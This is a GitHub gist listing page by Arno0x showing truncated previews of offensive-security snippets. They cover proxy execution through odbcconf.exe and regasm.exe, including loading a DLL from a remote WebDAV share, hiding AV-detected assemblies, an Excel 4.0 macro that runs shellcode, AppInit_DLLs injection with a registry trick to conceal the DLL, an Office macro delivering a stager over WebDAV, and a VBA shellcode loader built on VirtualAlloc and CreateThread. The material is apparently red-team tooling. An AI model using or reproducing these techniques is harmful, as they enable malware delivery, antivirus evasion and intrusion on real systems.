Skip to content

Instantly share code, notes, and snippets.

View Arno0x's full-sized avatar

Arno0x

878 followers · 0 following
View GitHub Profile
@Arno0x
Arno0x / poshB64Encode.sh
Last active June 22, 2020 14:21
#!/bin/bash
if [[ $1 == "-i" ]]; then
result=$(cat $2 | iconv --to-code UTF-16LE | base64 -w 0)
else
result=$(echo "$1" | iconv --to-code UTF-16LE | base64 -w 0)
fi
echo $result
@Arno0x
Arno0x / odbcconf.cs
Created November 22, 2017 15:30
Download and execute arbitrary code with odbcconf.exe
/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/
using System;
@Arno0x
Arno0x / regasm.cs
Created November 17, 2017 16:48
A DLL that can be called from regasm.exe/regsvc.exe to execute arbitrary code
/*
============== Compile ============
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framewor
@Arno0x
Arno0x / detected.cs
Last active August 31, 2022 02:36
Hiding an AV detected assembly into another one
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs
*/
using System.Diagnostics;
using System.Runtime.InteropServices;
@Arno0x
Arno0x / shellcode.xlsm
Last active May 13, 2023 23:22
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
@Arno0x
Arno0x / malicious.cs
Last active October 12, 2023 23:19
Hide malicious assembly in another one with RunTime code compiling
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
@Arno0x
Arno0x / appinitdllinjection.c
Last active October 12, 2023 23:19
AppInit_DLLs injection
// Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll
//
// This DLL can only be injected in a x64 process
//
// Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll)
// by using the AppInit_DLLs capability:
//
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma or space separated if required)
// One trick with this registry entry is to separate DLLs with an hex '00' (by editing the value in binary) to hide the DLL name
//
@Arno0x
Arno0x / macro_webdav_delivery.vba
Last active October 12, 2023 23:19
Office macro using WedDav mapping to deliver payload
'
' Example of DBC2 msbuild.xml stager delivery through a webdav maping
' The stager file (msbuild.xml) can be generated from the DBC2 controller
'
' NOTE:
' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml)
' but it fails miserably for me, so I have to have to first map the drive...
Sub Go()
Dim cmd As String, srv As String
@Arno0x
Arno0x / service.cs
Created September 5, 2017 07:57
A basic Windows service written in .Net/c#
/*
Creates a basic Windows Service using .Net framework.
Compile:
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs
Create the service with name "Service":
sc create Service type=own binpath= c:\Path\To\service.exe
Start the service:
@Arno0x
Arno0x / macro_evade_av.vba
Last active October 12, 2023 23:19
Load shellcode in macro, from bibliography souce
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long
#End If